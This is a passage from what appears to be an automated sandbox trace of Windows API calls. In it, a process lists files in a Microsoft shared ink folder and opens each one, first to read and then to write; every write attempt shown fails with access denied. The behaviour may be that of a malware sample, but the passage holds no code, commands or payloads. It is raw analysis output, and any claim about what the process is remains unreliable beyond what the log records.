(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.905] AreFileApisANSI () returned 1 [0099.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0099.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ec68 [0099.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 61 [0099.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.905] GetFileType (hFile=0x368) returned 0x1 [0099.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0099.905] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.905] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.906] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.906] CloseHandle (hObject=0x368) returned 1 [0100.000] AreFileApisANSI () returned 1 [0100.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ebe0 [0100.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 61 [0100.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.010] GetLastError () returned 0x5 [0100.010] GetLastError () returned 0x5 [0100.010] SetLastError (dwErrCode=0x5) [0100.010] GetLastError () returned 0x5 [0100.010] SetLastError (dwErrCode=0x5) [0100.010] GetLastError () returned 0x5 [0100.010] SetLastError (dwErrCode=0x5) [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.012] AreFileApisANSI () returned 1 [0100.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", lpUsedDefaultChar=0x0) returned 62 [0100.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.012] AreFileApisANSI () returned 1 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 62 [0100.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.012] GetFileType (hFile=0x368) returned 0x1 [0100.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0100.012] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.013] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.013] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.013] CloseHandle (hObject=0x368) returned 1 [0100.013] AreFileApisANSI () returned 1 [0100.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0100.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 62 [0100.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.013] GetLastError () returned 0x5 [0100.013] GetLastError () returned 0x5 [0100.013] SetLastError (dwErrCode=0x5) [0100.013] GetLastError () returned 0x5 [0100.013] SetLastError (dwErrCode=0x5) [0100.014] GetLastError () returned 0x5 [0100.014] SetLastError (dwErrCode=0x5) [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.014] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.015] AreFileApisANSI () returned 1 [0100.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll", lpUsedDefaultChar=0x0) returned 70 [0100.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.015] AreFileApisANSI () returned 1 [0100.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0100.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aeb0 [0100.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 70 [0100.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.016] GetFileType (hFile=0x368) returned 0x1 [0100.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.016] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.016] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.016] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.016] CloseHandle (hObject=0x368) returned 1 [0100.016] AreFileApisANSI () returned 1 [0100.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ac50 [0100.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 70 [0100.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.017] GetLastError () returned 0x5 [0100.017] GetLastError () returned 0x5 [0100.017] SetLastError (dwErrCode=0x5) [0100.017] GetLastError () returned 0x5 [0100.017] SetLastError (dwErrCode=0x5) [0100.017] GetLastError () returned 0x5 [0100.017] SetLastError (dwErrCode=0x5) [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0100.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.017] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.018] AreFileApisANSI () returned 1 [0100.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", lpUsedDefaultChar=0x0) returned 62 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.018] AreFileApisANSI () returned 1 [0100.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 